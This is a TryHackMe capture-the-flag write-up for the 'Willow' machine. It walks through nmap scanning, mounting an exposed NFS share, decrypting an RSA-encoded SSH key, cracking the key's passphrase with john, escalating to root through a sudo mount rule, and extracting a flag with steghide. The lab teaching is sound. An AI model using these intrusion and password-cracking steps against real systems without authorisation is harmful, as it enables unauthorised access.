Willow — TryHackMe — WriteUp

Hello. I’m Rahmos. Here is my Willow — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opened ports:

nmap -A -T4 -p- -v <ip>

nmap

nmap

There are 4 ports opened: 22 (SSH), 80 (HTTP), 111 (RPC), and 2049 (NFS).

As nfs is running, let’s check what directory can be mounted:

showmount -e <ip>

showmount

So, /var/failsafe can be mounted by any computers on this network(the * dedicates that). Let’s mount this folder to see what’s inside.

Follow these commands:

mkdir /tmp/willow

mount -t nfs 10.10.229.81:/var/failsafe /tmp/willow

Now cd to /tmp/willow to see what’s inside /var/failsafe:

/tmp/willow

And the content of “rsa_keys”:

rsa_keys

Well, up to now, I don’t know what those numbers mean, so just leave it there first.

Next, let’s access its website on port 80:

website

So many numbers here! It looks like an encrypted string. I’ll use http://icyberchef.com/ to decrypt.

decrypt

Ok the rest of the number is Willow’s private key, but encrypted by RSA algorithm. Look at the hint, I know the format to decrypt is:

Public Key: (e, n)

Private Key: (d, n)

And look back at the “rsa_keys”, I know what “e, d, n” is:

rsa_keys

e: 23
d: 61527
n: 37267

And the format to decrypt:

decrypted = (encrypted ** d) % n

So, let’s write some simple code using the format above to decrypt this RSA. You can find my code here.

After run, I’ve got the private key:

private key

Now crack the password of this key using john:

ssh2john rsakey.txt > johnrsa.txt

john — wordlist=rockyou.txt johnrsa.txt

john

I’ve got the password. chmod 600 rsakey.txt to make that private key usable. Then login to SSH using the private key and the password above.

ssh -i rsakey.txt willow@<ip>

ssh

I’m in!

ls -al

There is a “user.jpg” inside willow’s home folder. Looks like it’ll be the 1st flag. Transfer it to your machine using scp. From your machine:

scp -i rsakey.txt willow@10.10.229.81:/home/willow/user.jpg /home/<your-username>

The image will be your flag!

user flag

Now I’ll find a way to own root and get the final flag.

First, sudo -l to see if willow can run sudo:

Well, willow can run mount /dev/* without password needed. So let’s see what’s inside /dev:

/dev

There’s a “hidden_backup” file. Let’s mount it to willow home to see what’s inside:

mkdir /home/willow/hidden && sudo mount /dev/hidden_backup /home/willow/hidden

hidden_backup

Well there’s a “creds.txt” file. Inside it is root’s password! su root using this password and get the final flag!

root

/root/root.txt

Oh wait!! the root.txt is not the final flag!
Wait a min, I haven’t extracted anything from the “user.jpg”, right? Maybe there’s something suspicious there! Let’s extract the hidden data using steghide:

steghide extract -sf user.jpg

Then paste the root’s password and the hidden data is extracted! It will be your root’s flag.

root flag

The end.

HAPPY HACKING